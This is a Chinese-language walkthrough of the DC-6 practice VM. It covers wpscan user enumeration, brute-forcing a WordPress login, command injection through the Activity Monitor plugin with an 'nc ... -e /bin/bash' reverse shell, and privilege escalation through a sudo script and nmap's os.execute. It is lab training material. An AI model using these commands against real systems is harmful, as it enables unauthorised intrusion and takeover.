DC-6

环境配置

攻击机和靶机都设置为NAT,以防万一打个快照,另外靶机记得设置获取MAC地址

信息收集

靶机官网给出的两个线索:

需要去配置一下hosts文件,kali里面的密码本

1、使用nmap进行扫描,开放了22和80端口

图片

2、直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件

1
2
3
4
5
Windows系统下在 C:\windows\system32\drivers\etc\hosts
打开后在末尾添加:192.168.2.25 wordy
Linux系统下在/etc/hosts
vim /etc/hosts
添加 ip wordy

图片

3、查看了一下没有什么发现,扫描一下目录,扫描出了登陆界面,尝试一些弱口令,没有登陆进去

图片

4、既然是WordPress的网站,可以用它专门的扫描工具来扫描一下,wpscan,这个是kali里面自带的工具。

而且也找得到了后台登陆页面,题目也提示了密码本,所以可以寻找一下用户名。

图片

爆破

1、找到五个用户名:admin、mark、graham、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破。

vim dc-username.txt #将用户名放到其中
gunzip rockyou.txt.gz rockyou.txt #解压密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6-passwd.txt #将带有k01的密码导到dc6-paswd.txt中
2、使用wpscan来爆破

wpscan –url http://wordy/-U dc6-username.txt -P dc6-passwd.txt
找到mark的密码为:helpdesk01

图片

3、登陆后台

后台插件getshell

1、利用Activity monitor插件的rce漏洞来getshell

2、点击Activity monitor -> Tools

图片

3、执行命令的同时使用burp抓包,发送到repeater模块。

前端限制了只能填写15个字符,可以F12修改长度。

图片

4、反弹shell

kali终端上:nc -lvvp 4444
burp抓包修改为:nc ip 4444 -e /bin/bash
图片

图片

5、获取一个稳定一点的shell终端

python -c ‘import pty;pty.spawn(“/bin/bash”)’
图片

水平越权

1、因为是登录了mark,所以只能查看mark用户下的文件,提示了graham用户的密码为:GSo7isUM1D4

图片

2、成功越权到graham用户下

图片

提权

1、使用sudo -l查看用户有哪些命令操作

可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件

图片

2、查看一下脚本内容

cat /home/jens/backups.sh
图片

3、我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了。

图片

4、查看一下jens有哪些执行操作

图片

5、使用nmap脚本提权

发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了

echo ‘os.execute(“/bin/bash”)’ > shell
sudo nmap –script=shell

图片

知识点总结

1、信息收集

2、wpscan工具的使用,枚举用户名,爆破登录

3、WordPress 插件 activity monitor 远程代码执行漏洞

4、用户之间的水平越权,就是用户的切换

5、使用nmap来提权